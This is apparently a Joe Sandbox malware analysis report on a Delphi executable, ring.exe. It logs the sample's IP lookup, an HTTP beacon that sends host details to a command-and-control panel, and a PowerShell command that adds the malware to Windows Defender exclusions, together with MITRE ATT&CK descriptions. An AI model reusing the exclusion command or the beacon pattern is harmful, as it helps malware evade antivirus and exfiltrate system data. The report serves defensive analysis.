Nov 19, 2024 20:38:05.537547112 CET	49702	80	192.168.2.7	154.205.156.20
Nov 19, 2024 20:38:06.750593901 CET	49702	80	192.168.2.7	154.205.156.20
Nov 19, 2024 20:38:09.161593914 CET	49702	80	192.168.2.7	154.205.156.20
Nov 19, 2024 20:38:13.968336105 CET	49702	80	192.168.2.7	154.205.156.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2024 20:36:12.183645010 CET	59931	53	192.168.2.7	1.1.1.1
Nov 19, 2024 20:36:12.190618038 CET	53	59931	1.1.1.1	192.168.2.7
Nov 19, 2024 20:36:17.245806932 CET	57488	53	192.168.2.7	1.1.1.1
Nov 19, 2024 20:36:17.379138947 CET	53	57488	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 19, 2024 20:36:12.183645010 CET	192.168.2.7	1.1.1.1	0x4a00	Standard query (0)	api64.ipify.org	A (IP address)	IN (0x0001)	false
Nov 19, 2024 20:36:17.245806932 CET	192.168.2.7	1.1.1.1	0x18fc	Standard query (0)	adsklbb.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 19, 2024 20:36:12.190618038 CET	1.1.1.1	192.168.2.7	0x4a00	No error (0)	api64.ipify.org	104.237.62.213	A (IP address)	IN (0x0001)	false
Nov 19, 2024 20:36:12.190618038 CET	1.1.1.1	192.168.2.7	0x4a00	No error (0)	api64.ipify.org	173.231.16.77	A (IP address)	IN (0x0001)	false
Nov 19, 2024 20:36:17.379138947 CET	1.1.1.1	192.168.2.7	0x18fc	No error (0)	adsklbb.org	24.152.39.13	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api64.ipify.org

154.205.156.20

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49701	104.237.62.213	80	6300	C:\Users\user\Desktop\ring.exe

Timestamp	Bytes transferred	Direction	Data
Nov 19, 2024 20:36:12.198534012 CET	178	OUT	GET /?format=text HTTP/1.1 Host: api64.ipify.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/3.0 (compatible; Indy Library)
Nov 19, 2024 20:36:12.784324884 CET	166	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 19 Nov 2024 19:36:12 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49702	154.205.156.20	80	6300	C:\Users\user\Desktop\ring.exe

Timestamp	Bytes transferred	Direction	Data
Nov 19, 2024 20:36:14.650507927 CET	275	OUT	GET /Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Build%2019045%29%20&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A&status=Instalada&ip=8.46.123.75 HTTP/1.1 User-Agent: Delphi 5.x Host: 154.205.156.20 Cache-Control: no-cache
Nov 19, 2024 20:36:15.313024044 CET	372	IN	HTTP/1.1 200 OK Date: Tue, 19 Nov 2024 19:36:15 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 200 Content-Type: text/html; charset=UTF-8 Data Raw: 44 61 64 6f 73 20 52 65 63 65 62 69 64 6f 73 3a 3c 62 72 3e 4e 6f 6d 65 20 64 6f 20 50 43 3a 20 39 36 30 37 38 31 3c 62 72 3e 56 65 72 73 c3 a3 6f 20 64 6f 20 57 69 6e 64 6f 77 73 3a 20 57 69 6e 64 6f 77 73 20 31 30 2e 30 20 28 42 75 69 6c 64 20 31 39 30 34 35 29 20 3c 62 72 3e c3 9a 6c 74 69 6d 61 20 41 74 75 61 6c 69 7a 61 c3 a7 c3 a3 6f 3a 20 32 30 32 34 2d 31 31 2d 31 39 3c 62 72 3e 53 74 61 74 75 73 3a 20 49 6e 73 74 61 6c 61 64 61 3c 62 72 3e 44 61 64 6f 73 20 73 61 6c 76 6f 73 20 63 6f 6d 20 73 75 63 65 73 73 6f 20 6e 6f 20 61 72 71 75 69 76 6f 20 64 65 73 6b 74 6f 70 73 2e 74 78 74 21 Data Ascii: Dados Recebidos:<br>Nome do PC: 960781<br>Verso do Windows: Windows 10.0 (Build 19045) <br>ltima Atualizao: 2024-11-19<br>Status: Instalada<br>Dados salvos com sucesso no arquivo desktops.txt!

Statistics

CPU Usage

• ring.exe
• cmd.exe
• conhost.exe
• powershell.exe
• WmiPrvSE.exe
• ring.exe
• ring.exe

Click to jump to process

Memory Usage

• ring.exe
• cmd.exe
• conhost.exe
• powershell.exe
• WmiPrvSE.exe
• ring.exe
• ring.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry
• Network

Click to dive into process behavior distribution

Click to jump to process

Target ID:	4
Start time:	14:36:10
Start date:	19/11/2024
Path:	C:\Users\user\Desktop\ring.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ring.exe"
Imagebase:	0x7c0000
File size:	17'488'384 bytes
MD5 hash:	DEC85DE31C5A9E3754AB0FCFED8A3E79
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	14:36:15
Start date:	19/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:36:15
Start date:	19/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:36:15
Start date:	19/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Imagebase:	0x6f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:36:18
Start date:	19/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	14:36:28
Start date:	19/11/2024
Path:	C:\Users\user\AppData\Roaming\Win_24230\ring.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Win_24230\ring.exe"
Imagebase:	0xcb0000
File size:	17'488'384 bytes
MD5 hash:	DEC85DE31C5A9E3754AB0FCFED8A3E79
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 18%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:37:19
Start date:	19/11/2024
Path:	C:\Users\user\AppData\Roaming\Win_24230\ring.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Win_24230\ring.exe"
Imagebase:	0xcb0000
File size:	17'488'384 bytes
MD5 hash:	DEC85DE31C5A9E3754AB0FCFED8A3E79
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ring.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\atualizar_dados[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1n4c2z4z.3uk.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kecezh5z.vbm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndwve3xd.53z.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opwuol2n.wsj.psm1

C:\Users\user\AppData\Roaming\Win_24230\ring.exe

C:\Users\user\AppData\Roaming\Win_24230\ring.exe:Zone.Identifier

C:\Users\user\Desktop\att.txt

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Windows Analysis Report
ring.exe